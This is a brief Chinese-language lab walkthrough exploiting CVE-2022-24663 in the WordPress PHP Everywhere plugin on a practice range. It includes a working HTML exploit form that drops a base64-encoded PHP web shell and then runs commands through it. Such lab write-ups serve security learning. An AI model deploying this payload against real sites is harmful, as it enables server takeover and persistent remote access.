CVE-2022-24663
wordpress插件PHP Everywhere RCE 2.0.3以下
利用春秋云境上的靶场
访问页面
wordpress的默认后台是wp-admin
默认密码test/test
提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码
这里指的是任意PHP代码并且是任意位置
1.构建payload
随便找个html页面进行exp注入(摘抄大佬的payload)
记得要修改域名为自己现在做的靶场域名
并且这里的代码使用的是system
我使用eval函数无法进行访问(求大佬指点)
<form action="http://eci-2ze5uttid7svzb873n4j.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post"> <input name="action" value="parse-media-shortcode" /> <textarea name="shortcode">[php_everywhere] <?php file_put_contents("/var/www/html/fuck.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWzFdKTsgPz4=")); ?>[/php_everywhere]</textarea> <input type="submit" value="Execute" /> </form>
2.插入payload
3.出现这个框之后,直接把这个框里面的内容全部替换成上面的代码,然后直接点击【Execute】:
4.注入成功
5.访问fuck.php文件,进行代码执行
求大佬指点错误。